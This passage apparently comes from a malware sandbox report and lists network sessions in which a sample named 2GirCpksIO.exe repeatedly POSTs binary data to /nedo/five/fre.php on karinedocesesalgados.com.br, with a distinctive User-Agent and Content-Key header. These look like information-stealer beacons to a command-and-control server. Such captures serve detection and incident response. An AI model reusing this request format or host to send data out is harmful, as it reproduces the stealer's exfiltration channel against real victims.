                                333 | 192.168.11.20 | 50120 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                334 | 192.168.11.20 | 50121 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                335 | 192.168.11.20 | 50122 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                336 | 192.168.11.20 | 50123 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                337 | 192.168.11.20 | 50124 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                338 | 192.168.11.20 | 50125 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                339 | 192.168.11.20 | 50126 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                34 | 192.168.11.20 | 49821 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:39.121937990 CET | 359 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:39.435009956 CET | 360 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:39 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                35 | 192.168.11.20 | 49822 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:39.980678082 CET | 361 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:40.286241055 CET | 361 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:40 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                36 | 192.168.11.20 | 49823 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:40.829111099 CET | 362 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:41.142105103 CET | 362 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:40 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                37 | 192.168.11.20 | 49824 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:41.656853914 CET | 363 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:41.951401949 CET | 364 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:41 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                38 | 192.168.11.20 | 49825 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:42.447762012 CET | 364 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:42.733766079 CET | 365 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:42 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                39 | 192.168.11.20 | 49826 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:43.155024052 CET | 366 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:43.443574905 CET | 366 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:43 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                4 | 192.168.11.20 | 49791 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:09.708760977 CET | 320 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:10.039190054 CET | 320 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:09 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                40 | 192.168.11.20 | 49827 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:43.984467030 CET | 367 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:44.292969942 CET | 367 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:44 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                41 | 192.168.11.20 | 49828 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:44.781908035 CET | 368 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:45.068665028 CET | 369 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:44 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                42 | 192.168.11.20 | 49829 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:45.550425053 CET | 369 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:45.870554924 CET | 370 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:45 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                43 | 192.168.11.20 | 49830 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:46.388341904 CET | 371 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:46.679601908 CET | 371 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:46 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                44 | 192.168.11.20 | 49831 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:47.208873987 CET | 372 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:47.578627110 CET | 372 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:47 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                45 | 192.168.11.20 | 49832 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:48.089770079 CET | 373 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:48.392205000 CET | 374 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:48 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                46 | 192.168.11.20 | 49833 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:48.907541037 CET | 374 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:49.221297979 CET | 375 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:48 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                47 | 192.168.11.20 | 49834 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:49.746555090 CET | 376 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:50.056238890 CET | 376 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:49 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                48 | 192.168.11.20 | 49835 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:50.586189985 CET | 377 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:50.897164106 CET | 377 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:50 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                480192.168.11.2050267192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                481192.168.11.2050268192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                482192.168.11.2050269192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                483192.168.11.2050270192.185.217.24680C:\Users\user\Desktop\2GirCpksIO.exe
                                TimestampkBytes transferredDirectionData


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                484 | 192.168.11.20 | 50271 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                485 | 192.168.11.20 | 50272 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                486 | 192.168.11.20 | 50273 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                487 | 192.168.11.20 | 50274 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                488 | 192.168.11.20 | 50275 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                489 | 192.168.11.20 | 50276 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                49 | 192.168.11.20 | 49836 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:51.421232939 CET | 378 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:51.711165905 CET | 379 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:51 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                490 | 192.168.11.20 | 50277 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                491 | 192.168.11.20 | 50278 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                5 | 192.168.11.20 | 49792 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:10.753878117 CET | 321 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:11.076780081 CET | 322 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:10 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                50 | 192.168.11.20 | 49837 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:52.227112055 CET | 379 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:52.547043085 CET | 380 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:52 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                51 | 192.168.11.20 | 49838 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:53.057143927 CET | 381 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:53.349915981 CET | 381 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:53 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                52 | 192.168.11.20 | 49839 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:53.809156895 CET | 382 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:54.101151943 CET | 382 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:53 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                53 | 192.168.11.20 | 49840 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:54.636790991 CET | 383 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:54.950619936 CET | 384 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:54 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                54 | 192.168.11.20 | 49841 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:55.476605892 CET | 384 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:55.828042030 CET | 385 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:55 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                55 | 192.168.11.20 | 49842 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:56.348588943 CET | 386 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:56.651110888 CET | 386 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:56 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                56 | 192.168.11.20 | 49843 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:57.167977095 CET | 387 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:57.496169090 CET | 387 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:57 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                57 | 192.168.11.20 | 49844 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:58.023260117 CET | 388 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
                                Nov 22, 2021 15:29:58.339368105 CET | 389 | IN | HTTP/1.1 200 OK
                                Date: Mon, 22 Nov 2021 14:29:58 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Content-Length: 23
                                Content-Type: text/html
                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                Data Ascii: File not found.


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                58 | 192.168.11.20 | 49845 | 192.185.217.246 | 80 | C:\Users\user\Desktop\2GirCpksIO.exe
                                Timestamp | kBytes transferred | Direction | Data
                                Nov 22, 2021 15:29:58.864840984 CET | 389 | OUT | POST /nedo/five/fre.php HTTP/1.0
                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                Host: karinedocesesalgados.com.br
                                Accept: */*
                                Content-Type: application/octet-stream
                                Content-Encoding: binary
                                Content-Key: E0D53234
                                Content-Length: 151
                                Connection: close
